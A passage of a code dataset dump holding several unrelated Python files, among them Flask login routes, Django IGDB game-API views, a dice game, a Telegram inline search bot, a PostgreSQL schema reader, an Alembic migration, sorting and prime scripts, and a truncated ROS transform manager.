import request, redirect\nimport databaseOperation as crud\nfrom flask import session\nimport json\n\nloginSignUp = Blueprint('loginSignUp', __name__)\n\n\n@loginSignUp.route('/login', methods = ['POST'])\ndef login():\n if request.method == 'POST':\n if not session['loggedIn']:\n # Verifiying the CSRF Token\n if request.headers['CSRFToken'] == session['CSRFToken']:\n loginData = json.loads(request.data.decode())\n userData = crud.get_User(loginData['email'])\n\n if userData:\n if crud.verify_UserPassword(loginData['email'], loginData['password']):\n # User Successfully Signed In\n session['name'] = userData.name\n session['email'] = userData.email\n session['loggedIn'] = True\n\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'loggedIn': True\n })\n return response, 200\n else:\n # Invalid Email or Password\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'Invalid Email or Password'\n })\n return response, 401\n else:\n # If CSRF Verification fails\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'Invalid Token'\n })\n return response, 400\n \n # Redirect User If already Logged In\n return redirect('/')\n\n@loginSignUp.route('/signUp', methods = ['POST'])\ndef signUp():\n if request.method == 'POST':\n if not session['loggedIn']:\n # Verifiying the CSRF Token\n if request.headers['CSRFToken'] == session['CSRFToken']:\n signUpData = json.loads(request.data.decode())\n\n if crud.add_SignUp(signUpData):\n # User Successfully Added and Signed In\n session['name'] = signUpData['name']\n session['email'] = signUpData['email']\n session['loggedIn'] = True\n\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'loggedIn': True\n })\n return response, 200\n else:\n # User Already Exist\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'User Already Exist'\n })\n return response, 409\n else:\n # If CSRF Verification fails\n response = make_response()\n response.headers['Content'] = json.dumps({\n 'response': 'Invalid Token'\n })\n return response, 400\n \n # Redirect User If already Logged In\n return 
redirect('/')\n\n@loginSignUp.route('/logout')\ndef logout():\n if session['loggedIn']:\n del session['name']\n del session['email']\n session['loggedIn'] = False\n return redirect('/')\n","repo_name":"aditsrivastava4/chat-app","sub_path":"src/loginSignUp/LoginSighUp.py","file_name":"LoginSighUp.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18716163795","text":"import json\nimport requests\nfrom datetime import datetime\nfrom django.conf import settings\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom rest_framework.decorators import api_view\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.response import Response\nfrom actions.models import Ratings\nfrom actions.serializers import RatingSerializer\nfrom .fields import game_fields, search_fields, company_fields, company_logo_fields, company_game_fields, popular_fields, backdrop_fields, genre_fields, recents_fields, upcoming_fields\nfrom .models import Game\n\n\n@api_view(['GET'])\ndef get_genres(request):\n \"\"\"Get list of all genres\n Makes call to https://api.igdb.com/v4/genres with maximum limit and no params\n \"\"\"\n data = f'fields {genre_fields}; limit 50;'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='genres')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n return Response(r)\n \n@api_view(['GET'])\ndef get_games(request):\n \"\"\"Get a list of games from IGDB.\n\n Makes a call to the `https://api.igdb.com/v4/games` endpoint, specifying the\n fields (defined as `game_fields` in fields.py) and game IDs in the POST data.\n \n For more details read https://api-docs.igdb.com/?javascript#game.\n\n Args:\n slugs: a list of unique name of the game e.g. dark-souls, prey, prey--1. maximum of 10 per request\n\n Returns:\n game: a JSON response containing a list of the details of the games.\n \"\"\"\n slugs = request.GET['slugs']\n slugs = (\",\").join([f'\"{x}\"' for x in slugs.split(\",\")][:10])\n \n data = f'fields {game_fields}; where slug=({slugs});'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n if not r:\n raise NotFound(detail='Game not found.')\n\n return Response(r)\n\n@api_view(['GET'])\ndef get_game(request, slug):\n \"\"\"Get a game from IGDB.\n\n Makes a call to the `https://api.igdb.com/v4/games` endpoint, specifying the\n fields (defined as `game_fields` in fields.py) and game ID in the POST data.\n \n For more details read https://api-docs.igdb.com/?javascript#game.\n\n Args:\n slug: unique name of the game e.g. dark-souls, prey, prey--1.\n\n Returns:\n game: a JSON response containing the details of a game.\n \"\"\"\n data = f'fields {game_fields}; where slug=\"{slug}\";'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n if not r:\n raise NotFound(detail='Game not found.')\n\n return Response(r)\n\n\n@api_view(['GET'])\ndef search_game(request, name):\n \"\"\"Search a game based on a name.\n \n Calls `https://api.igdb.com/v4/games` specifying the search term in the\n POST data. The search term must be a string, the name of the game. 
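
The slug batching done in get_games above is easy to verify in isolation; a small sketch of the same quoting and capping logic, with illustrative slug values only:

slugs = "dark-souls,prey,prey--1"
quoted = ",".join(f'"{s}"' for s in slugs.split(",")[:10])  # cap at 10, quote each slug
query = f"fields name,slug; where slug=({quoted});"
print(query)  # fields name,slug; where slug=("dark-souls","prey","prey--1");
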
The\n fields shown in the results are defined in `search_fields` from fields.py.\n \n For more details on how to search the IGDB API, read \n https://api-docs.igdb.com/?javascript#search-176.\n\n Args:\n name: the search term, name of the desired game.\n\n Returns:\n games: a JSON containing a list of search results.\n \"\"\"\n data = f'fields {search_fields}; search \"{name}\";'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_frontpage_games(request):\n \"\"\"Gets a set of recently released games and upcoming games from today.\"\"\"\n \n now = int(datetime.timestamp(datetime.now()))\n recents_query = f'fields {recents_fields}; sort first_release_date desc; where first_release_date < {now};'\n upcoming_query = f'fields {upcoming_fields}; sort first_release_date asc; where first_release_date > {now} & release_dates.category = 0;'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n\n recents = requests.post(url=url, data=recents_query, headers=headers)\n upcoming = requests.post(url=url, data=upcoming_query, headers=headers)\n r = {'recents': recents.json(), 'upcoming': upcoming.json()}\n return Response(r) \n\ndef get_company_logo(id):\n \"\"\"Gets company logo.\"\"\"\n \n query = f'fields {company_logo_fields}; where id = {id};'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='company_logos')\n\n return requests.post(url=url, data=query, headers=headers).json()\n\ndef get_games_by_company(cid):\n \"\"\"Gets games created by a particular company.\"\"\"\n \n query = f'fields {company_game_fields}; where involved_companies.company = {cid} & involved_companies.developer = true;'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n\n return requests.post(url=url, data=query, headers=headers).json()\n\n@api_view(['GET'])\ndef get_company(request, cid):\n \"\"\"Gets Company/Creator of games from IGDB.\"\"\"\n \n query = f'fields {company_fields}; where id = {cid};'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='companies')\n\n company_json = requests.post(url=url, data=query, headers=headers).json()\n\n company_json[0]['logo_details'] = get_company_logo(company_json[0]['logo'])\n\n games_json = get_games_by_company(cid)\n\n r = {'company': company_json, 'games': games_json}\n\n return Response(r) \n\n@api_view(['GET'])\ndef get_popular_games(request):\n \"\"\"Gets popular or trending games.\n \n Calls the `games` endpoint, sorting the results by popularity (desc).\n This endpoint is called in Overworld's landing page. An example of this\n is documented on IGDB https://api-docs.igdb.com/?javascript#examples-12. 
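
Every view in this module follows the same request pattern: an Apicalypse query string POSTed with client-id and authorization headers. A standalone sketch of that pattern; the credentials and field list are placeholders, not values from the project:

import time
import requests

IGDB_URL = 'https://api.igdb.com/v4/{endpoint}'
headers = {'client-id': '<CLIENT_ID>', 'authorization': 'Bearer <ACCESS_TOKEN>'}
now = int(time.time())
data = f'fields name,first_release_date; sort first_release_date desc; where first_release_date < {now}; limit 5;'
# The query body is plain text, not JSON; requests sends it as-is.
for game in requests.post(IGDB_URL.format(endpoint='games'), data=data, headers=headers).json():
    print(game.get('name'), game.get('first_release_date'))
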
\n\n Takes limit parameter with max of 50, min 1 and default of 6 if not passed\n Returns:\n games: games sorted by popularity.\n \"\"\"\n \n\n #get parameters with defaults and check bounds\n limit = int(request.GET.get(\"limit\", 6)) \n limit = limit if limit < 50 and limit > 0 else 6 \n\n offset = int(request.GET.get(\"offset\", 0))\n offset = offset if offset >= 0 and offset < 150 else 0\n\n filters = request.GET.get(\"filters\", '{}')\n filters = json.loads(filters)\n\n adultContent = request.GET.get(\"adultContent\", False)\n\n conditions = \"\"\n\n if 'genre' in filters and len(filters['genre']):\n ids = tuple([x['id'] for x in filters['genre']]) if len(filters['genre']) > 1 else filters['genre'][0]['id'] #create list of id's in format required by IGDB api\n conditions += f\"where genres={ids};\"\n \n if 'date' in filters and len(filters['date']):\n if filters['date'][0]:\n conditions += f\"where release_date.date <= {filters['date'][0]['utc']};\"\n if filters['date'][1]:\n conditions += f\"where release_date.date >= {filters['date'][1]['utc']};\"\n\n if 'developer' in filters and len(filters['developer']):\n pass\n\n if not adultContent:\n data = f'fields {popular_fields}; where date < 1538129353; sort date desc; limit {limit}; offset {offset};' + conditions\n print(data)\n if adultContent:\n data = f'fields {popular_fields}; sort follows asc; limit {limit}; offset {offset};' + conditions\n\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='release_dates')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_backdrop(request, guid):\n \"\"\"Gets the background image for the landing page.\n \n Makes a call to `https://api.igdb.com/v4/games`, with image-related fields\n only. 
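
One caveat in the filter assembly above: it appends a separate `where ...;` clause per active filter, while IGDB's Apicalypse grammar takes a single where clause with conditions joined by `&`. A hedged sketch of building one combined clause (the filter values are example data, not from the source):

conditions = []
genre_ids = [12, 31]       # example genre filter
max_date = 1538129353      # example upper bound on release date
if genre_ids:
    conditions.append('genres = ({})'.format(','.join(map(str, genre_ids))))
if max_date:
    conditions.append('date < {}'.format(max_date))
where = ' where {};'.format(' & '.join(conditions)) if conditions else ';'
print('fields game.name; sort date desc; limit 6' + where)
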
The game the backdrop is selected from is randomly selected in the \n frontend.\n\n Args:\n guid: ID of the game.\n\n Returns:\n backdrop: a JSON object with the image IDs necessary for the backdrop.\n \"\"\"\n data = f'fields {backdrop_fields}; where id={guid};'\n headers = {'client-id': settings.IGDB_KEY, 'authorization': settings.IGDB_AUTH}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_game_ratings(request, slug):\n \"\"\"Endpoint for getting ratings for a game.\n\n Supports only GET.\n\n Args:\n slug: slugified name of a game (unique)\n Returns:\n data: [{game, user_id, rating}...]\n \"\"\"\n try:\n game = Game.objects.get(slug=slug)\n ratings = Ratings.objects.filter(game=game)\n serializer = RatingSerializer(ratings, many=True).data\n return Response(serializer)\n except:\n raise NotFound(detail='Game does not have rating.')\n \n ","repo_name":"danielgrijalva/overworld","sub_path":"backend/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"72"} +{"seq_id":"16023083745","text":"from dataclasses import dataclass\r\nfrom random import randint\r\n\r\n@dataclass\r\nclass DiceFactory:\r\n name: str\r\n value: int\r\n save: bool = False\r\n \r\n def roll(self):\r\n self.value = randint(1,6)\r\n \r\n def save(self):\r\n self.save == True\r\n\r\ndef main():\r\n dice=create_dice()\r\n roll_again = \"y\"\r\n score = 0\r\n roll = 0\r\n while roll_again == \"y\" and roll <3:\r\n roll +=1\r\n roll_dice(dice)\r\n d2p=get_dice(dice)\r\n print(f\"{'='*21}\\n {d2p}\\n{'='*21}\")\r\n print(f\"Number of rolls: {roll}\")\r\n dice, score = check_dice(dice, score) \r\n if roll <3: \r\n roll_again = input(\"\\nPress 'Y' to roll the dice again: \").lower()\r\n if score == 0:\r\n print(f\"\\nYou failed to secure as Captain, Ship and Cargo and are left with {score} gold.\\n\")\r\n else:\r\n print(f\"\\n{'='*28}\\n Final Cargo Value: {score} gold\\n{'='*28}\\n\") \r\n return\r\n\r\ndef check_dice(dice, score):\r\n current_roll = []\r\n current_roll.clear()\r\n for i in range(5):\r\n current_roll.append(dice[i].value)\r\n \r\n if 6 in current_roll:\r\n print(f\"\\n[6] A Captain has been found!\")\r\n dice[0].value = 6\r\n dice[0].save = True\r\n \r\n if 6 in current_roll and 5 in current_roll:\r\n print(f\"[5] The Captain has secured a ship!\")\r\n dice[1].value = 5\r\n dice[1].save = True\r\n \r\n if 6 in current_roll and 5 in current_roll and 4 in current_roll:\r\n score = sum(current_roll)-15\r\n print(\"[4] The Captain has hired a crew!\")\r\n if score == 12:\r\n print(f\"\\nCurrent cargo is worth {score}, thats the largest hual I've ever seen!\")\r\n else:\r\n print(f\"\\nCurrent cargo of barrells is worth {score} gold!\")\r\n dice[2].value = 4\r\n dice[2].save = True\r\n return dice, score\r\n \r\ndef roll_dice(dice):\r\n for i in range(5):\r\n if dice[i].save == False:\r\n dice[i].roll()\r\n return dice\r\n\r\ndef get_dice(dice):\r\n d2p = \"\"\r\n for i in range(5):\r\n d2p += (f\"[{dice[i].value}] \")\r\n return d2p\r\n\r\ndef create_dice(): \r\n dice=[]\r\n for i in range(5):\r\n dice.append(DiceFactory(f\"d{i+1}\",0,False))\r\n dice[i].roll()\r\n return dice\r\n\r\nif __name__ == \"__main__\":\r\n main() 
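
A note on the DiceFactory record above: it declares a `save` field and then defines a `save()` method of the same name, so the later definition clobbers the field's class-level default, and the method body compares (`self.save == True`) instead of assigning. A hedged rework with the flag renamed so the two no longer collide:

from dataclasses import dataclass
from random import randint

@dataclass
class Die:
    name: str
    value: int = 0
    kept: bool = False  # renamed from `save` to avoid colliding with a method name

    def roll(self) -> None:
        if not self.kept:
            self.value = randint(1, 6)

    def keep(self) -> None:
        self.kept = True  # assignment, where the original had a no-op comparison

die = Die('d1')
die.roll()
die.keep()
print(die)
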
","repo_name":"QubeUK/Dice","sub_path":"dice_class.py","file_name":"dice_class.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"922814480","text":"from pyrogram.types import (InlineKeyboardButton,\n InlineKeyboardMarkup,\n InlineQueryResultPhoto)\nfrom youtubesearchpython.__future__ import VideosSearch\n\nfrom config import BANNED_USERS, MUSIC_BOT_NAME\nfrom Musikku import app\nfrom Musikku.utils.inlinequery import answer\n\n\n@app.on_inline_query(~BANNED_USERS)\nasync def inline_query_handler(client, query):\n text = query.query.strip().lower()\n answers = []\n if text.strip() == \"\":\n try:\n await client.answer_inline_query(\n query.id, results=answer, cache_time=10\n )\n except:\n return\n else:\n a = VideosSearch(text, limit=20)\n result = (await a.next()).get(\"result\")\n for x in range(15):\n title = (result[x][\"title\"]).title()\n duration = result[x][\"duration\"]\n views = result[x][\"viewCount\"][\"short\"]\n thumbnail = result[x][\"thumbnails\"][0][\"url\"].split(\"?\")[\n 0\n ]\n channellink = result[x][\"channel\"][\"link\"]\n channel = result[x][\"channel\"][\"name\"]\n link = result[x][\"link\"]\n published = result[x][\"publishedTime\"]\n description = f\"{views} | {duration} Mins | {channel} | {published}\"\n buttons = InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"🎥 Nonton Di Youtube\",\n url=link,\n )\n ],\n ]\n )\n searched_text = f\"\"\"\n❇️**Judul:** [{title}]({link})\n\n⏳**Durasi:** {duration} Menit\n👀**Penonton:** `{views}`\n⏰**Waktu Publikasi:** {published}\n🎥**Nama Channel:** {channel}\n📎**Tautan Channel:** [Kunjungi Dari Sini]({channellink})\n\n__Balas dengan /play pada pesan yang dicari ini untuk mengalirkannya di obrolan suara.__\n\n⚡️ ** Pencarian Inline Oleh {MUSIC_BOT_NAME} **\"\"\"\n answers.append(\n InlineQueryResultPhoto(\n photo_url=thumbnail,\n title=title,\n thumb_url=thumbnail,\n description=description,\n caption=searched_text,\n reply_markup=buttons,\n )\n )\n try:\n return await client.answer_inline_query(\n query.id, results=answers\n )\n except:\n return\n","repo_name":"EmiliaTzy/Musikku","sub_path":"Musikku/plugins/bot/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"13009283155","text":"'''DB description module'''\n\nimport copy\nimport psycopg2\nfrom pgdocgen.ddlobject.ddlobject import DDLObject\n\n\nclass DB(DDLObject):\n '''DB schema class'''\n conn = None\n contents = []\n\n def connect(self, db_connection_string):\n '''Make db connection'''\n self.conn = psycopg2.connect(db_connection_string)\n\n def read_contents(self):\n '''Read all schemas in database'''\n cur = self.conn.cursor()\n cur.execute('''select nspname,\n description\n from pg_catalog.pg_namespace s\n left join pg_catalog.pg_description d\n on (d.objoid = s.oid)\n where s.nspname not like 'pg\\_%' and\n s.nspname <> 'information_schema'\n order by s.nspname''')\n schemas = cur.fetchall()\n cur.close()\n from pgdocgen.ddlobject.schema import Schema\n for (schema, comment) in [(x[0], x[1]) for x in schemas]:\n schema_obj = Schema(schema, comment, self.conn)\n self.contents.append(copy.deepcopy(schema_obj))\n self.conn.close()\n\n def __init__(self, db_connection_string):\n '''DB constructor'''\n self.contents = []\n self.object_type = 'database'\n self.connect(db_connection_string)\n 
self.read_contents()\n","repo_name":"C-Pro/pgdocgen","sub_path":"pgdocgen/ddlobject/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"29752502209","text":"\"\"\"PhotoPage URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include, patterns\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.sitemaps.views import sitemap\nfrom .sitemaps import SitemapCategory, SitemapContacts, SitemapAboutUs\n\nadmin.autodiscover()\n\nsitemaps = {'category': SitemapCategory,\n            'about': SitemapAboutUs,\n            'contacts': SitemapContacts,\n            }\n\nurlpatterns = [\n    url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n    url(r'^admin/', admin.site.urls, name='admin'),\n    url(r'^info/', include('inform.urls')),\n    url(r'^auth/', include('loginsys.urls')),\n    url(r'^', include('catalog.urls')),\n\n    url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n        name='django.contrib.sitemaps.views.sitemap'),\n    ]\n\nurlpatterns += patterns('',\n                        (r'^media/(?P<path>.*)$', 'django.views.static.serve', {\n                            'document_root': settings.MEDIA_ROOT}))","repo_name":"NikolayPogoreliy/PhotoPage","sub_path":"PhotoPage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24483948730","text":"# find the 10,001st prime\r\n\r\nprint(\"Starting...\")\r\n\r\nprimes = [2]\r\n\r\ncurrentlength = 1\r\n\r\ncounter = 3\r\n\r\nisCounterPrime = True\r\n\r\nwhile currentlength < 10001:\r\n    for idx in range(currentlength):\r\n        if counter % primes[idx] == 0:\r\n            isCounterPrime = False\r\n            break\r\n    if isCounterPrime:\r\n        primes.append(counter)\r\n        currentlength+=1\r\n    counter+=2\r\n    isCounterPrime = True\r\n    if currentlength%1000 == 0:\r\n        print(currentlength)\r\n    \r\n\r\nprint(primes[-1])\r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 6.py","file_name":"problem 6.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25342752749","text":"import os\nimport hashlib\nimport tempfile\nimport pickle\nfrom common_constants import constants\nfrom datetime import date\nENVI = constants.EnviVar(\n    main_dir=\"/home/eugene/Yandex.Disk/localsource/google_analytics/\",\n    cred_dir=\"/home/eugene/Yandex.Disk/localsource/credentials/\"\n)\nlogger = constants.logging.getLogger(__name__)\n\n\nclass MemoryDiscoveryCache:\n    \"\"\"\n    https://github.com/googleapis/google-api-python-client/tree/master/googleapiclient/discovery_cache\n    https://github.com/googleapis/google-api-python-client/issues/325\n    Based on Schweigi's solution on 22 Jan 2017\n    \"\"\"\n    _CACHE = {}\n\n    @staticmethod\n    def get(url):\n        return MemoryDiscoveryCache._CACHE.get(url)\n\n    @staticmethod\n    def 
set(url, content):\n        MemoryDiscoveryCache._CACHE[url] = content\n\n\nclass TmpFileDiscoveryCache:\n    \"\"\"\n    https://github.com/googleapis/google-api-python-client/tree/master/googleapiclient/discovery_cache\n    https://github.com/googleapis/google-api-python-client/issues/325\n    Based on Schweigi's and Chronial solutions on 7 Sep 2018\n    \"\"\"\n    @staticmethod\n    def filename(url):\n        return os.path.join(\n            tempfile.gettempdir(),\n            'google_api_discovery_' + hashlib.md5(url.encode()).hexdigest())\n\n    def get(self, url):\n        try:\n            with open(self.filename(url), 'rb') as f:\n                return f.read().decode()\n        except FileNotFoundError:\n            return None\n\n    def set(self, url, content):\n        with tempfile.NamedTemporaryFile(delete=False) as f:\n            f.write(content.encode())\n            f.flush()\n            os.fsync(f.fileno())  # fsync expects a file descriptor, not a file object\n            os.rename(f.name, self.filename(url))\n\n\nclass DumpFileDiscoveryCache:\n    \"\"\"\n    https://github.com/googleapis/google-api-python-client/tree/master/googleapiclient/discovery_cache\n    https://github.com/googleapis/google-api-python-client/issues/325\n    Based on Schweigi's and Chronial solutions on 7 Sep 2018\n    \"\"\"\n    @staticmethod\n    def filename(url):\n        return f'{ENVI[\"MAIN_PYSEA_DIR\"]}alldata/cache/' \\\n               f'google_api_discovery_{date.today()}_{hashlib.md5(url.encode()).hexdigest()}.pickle'\n\n    def get(self, url):\n        try:\n            with open(self.filename(url), 'rb') as f:\n                return pickle.load(f)\n        except FileNotFoundError:\n            return None\n\n    def set(self, url, content):\n        logger.debug(f\"DumpFileDiscoveryCache SET: {content}\")\n        with open(self.filename(url), \"wb\") as f:\n            pickle.dump(content, f, pickle.HIGHEST_PROTOCOL)\n","repo_name":"ekomissarov/google_analytics","sub_path":"google_analytics/analyticscache.py","file_name":"analyticscache.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13395529408","text":"\"\"\"songs table\n\nRevision ID: 946fc5eb5c3f\nRevises: 7c4d33b2f0d6\nCreate Date: 2021-12-15 17:30:52.818293\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '946fc5eb5c3f'\ndown_revision = '7c4d33b2f0d6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('song',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('track_name', sa.String(length=128), nullable=True),\n    sa.Column('artist_name', sa.String(length=64), nullable=True),\n    sa.Column('genre', sa.String(length=64), nullable=True),\n    sa.Column('beats_per_minute', sa.Integer(), nullable=True),\n    sa.Column('popularity', sa.Integer(), nullable=True),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('popularity'),\n    sa.UniqueConstraint('track_name')\n    )\n    op.drop_table('followers')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n    op.create_table('followers',\n    sa.Column('follower_id', sa.INTEGER(), nullable=True),\n    sa.Column('followed_id', sa.INTEGER(), nullable=True),\n    sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),\n    sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )\n    )\n    op.drop_table('song')\n    # ### end Alembic commands ###\n","repo_name":"ohimjosh/iMusic-Leaderboards","sub_path":"migrations/versions/946fc5eb5c3f_songs_table.py","file_name":"946fc5eb5c3f_songs_table.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38633628575","text":"# Merge sort algorithm\n\nimport time\n\ndef merge_sort(merge_list):\n    # Divide the list into two separate lists\n    if len(merge_list) > 1:\n        mid = len(merge_list) // 2\n        left_half = merge_list[:mid]\n        right_half = merge_list[mid:]\n\n        merge_sort(left_half)\n        merge_sort(right_half)\n        i = 0\n        j = 0\n        k = 0\n        # Main sorting loop: merge the two sorted halves\n        while i < len(left_half) and j < len(right_half):\n            if left_half[i] < right_half[j]:\n                merge_list[k] = left_half[i]\n                i += 1\n            else:\n                merge_list[k] = right_half[j]\n                j += 1\n            #End if\n            k += 1\n        #End while\n\n        #Check for unmerged elements on left half\n        while i < len(left_half):\n            merge_list[k] = left_half[i]\n            i += 1\n            k += 1\n        #End while\n\n        #Check for unmerged elements on right half\n        while j < len(right_half):\n            merge_list[k] = right_half[j]\n            j += 1\n            k += 1\n        #End while\n    #End if\n#End function\n\nmerge_list = [6,5,2,77,55,334,53,553,53,64,76,24,86,43,55,1,335,545,6,7,38]\nstart = time.perf_counter()\nmerge_sort(merge_list)\nend = time.perf_counter()\nelapsed = end - start\nprint(\"Sorted list: \", merge_list, \" Time taken: \", elapsed)\n","repo_name":"RowleySanchezm/Yr12ComputerScience","sub_path":"Sorting algorithms/Merge sort.py","file_name":"Merge sort.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20689391682","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport pkgutil\nimport rospy\nfrom sensor_msgs.msg import JointState\nfrom geometry_msgs.msg import Point, Point32\nfrom std_msgs.msg import String\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom std_msgs.msg import Header\nimport math\nimport time\nfrom PyKDL import Frame, Vector, Rotation\nimport PyKDL\nimport tf\nimport superros.transformations as transformations\nfrom superros.logger import Logger\nfrom rocup.storage.tf_storage import TfStorage\nfrom superros.comm import RosNode\nfrom rocup.proxy.proxy_message import SimpleMessage, SimpleMessageProxy\n\nimport message_filters\nimport rospkg\nimport numpy as np\nimport math\nimport sys\nimport random\n\n#⬢⬢⬢⬢⬢➤ NODE\nnode = RosNode(\"tf_manager\")\n\nnode.setupParameter(\"hz\", 30)\nnode.setupParameter(\"world_tf\", \"world\")\nnode.setupParameter(\"target_tf\", \"target\")\nnode.setupParameter(\"storage_prefix\", \"saved_\")\nnode.setupParameter(\"max_save_iterations\", 30)\nnode.setHz(node.getParameter(\"hz\"))\n\n#⬢⬢⬢⬢⬢➤ variables\nmessage_proxy = SimpleMessageProxy()\ntf_storage = TfStorage()\nall_tfs = []\npublishing = True\n\n\ndef command_cb(message):\n    global current_tf_name, publishing, all_tfs\n    if message.isValid():\n        receiver = message.getReceiver()\n        command = message.getCommand()\n        if receiver == node.getName():\n            print(\"New command received\", message.toString())\n            #⬢⬢⬢⬢⬢➤ UPDATE\n            if command == 'update':\n                all_tfs = tf_storage.allTfs()\n                return\n            #⬢⬢⬢⬢⬢➤ START 
PUBLISH\n            if command == 'start_publish':\n                publishing = True\n                return\n            #⬢⬢⬢⬢⬢➤ STOP PUBLISH\n            if command == 'stop_publish':\n                publishing = False\n                return\n            #⬢⬢⬢⬢⬢➤ DELETE_ALL\n            if command == 'delete_all':\n                tf_storage.deleteAll()\n                all_tfs = []\n                return\n            #⬢⬢⬢⬢⬢➤ DELETE\n            if command == 'delete':\n                saving_name = message.getData(\"saving_name\")\n                tf_storage.removeFrameByName(saving_name)\n                all_tfs = tf_storage.allTfs()\n                return\n            #⬢⬢⬢⬢⬢➤ SAVE\n            if command == 'save':\n                saving_name = message.getData(\"saving_name\")\n                tf_name = message.getData(\"tf_name\")\n                tf_parent = message.getData(\"tf_parent\")\n                iterations = node.getParameter(\"max_save_iterations\")\n                if tf_name is None:\n                    Logger.error(\"'tf_name' must not be None\")\n                    return\n                if tf_parent is None:\n                    Logger.error(\"'tf_parent' must not be None\")\n                    return\n                if saving_name is None:\n                    Logger.error(\"'saving_name' must not be None\")\n                    return\n                while iterations > 0:\n                    frame = node.retrieveTransform(\n                        tf_name,\n                        tf_parent,\n                        -1\n                    )\n                    if frame:\n                        tf_storage.saveFrame(\n                            frame,\n                            saving_name,\n                            tf_parent\n                        )\n                        print(\"Saving \", tf_name, tf_parent)\n                        return\n                    iterations -= 1\n                Logger.error(\n                    \"Max iterations reached, retrieving '{}'\".format(tf_name))\n\n\nmessage_proxy.register(command_cb)\n\nwhile node.isActive():\n    if publishing:\n        for tf in all_tfs:\n            tf_parent = tf[1][\"parent_tf\"]\n            tf_name = tf[1][\"name\"]\n            tf_data = tf[0]\n            # print(\"Publish\", tf_parent, tf_name, tf_data)\n            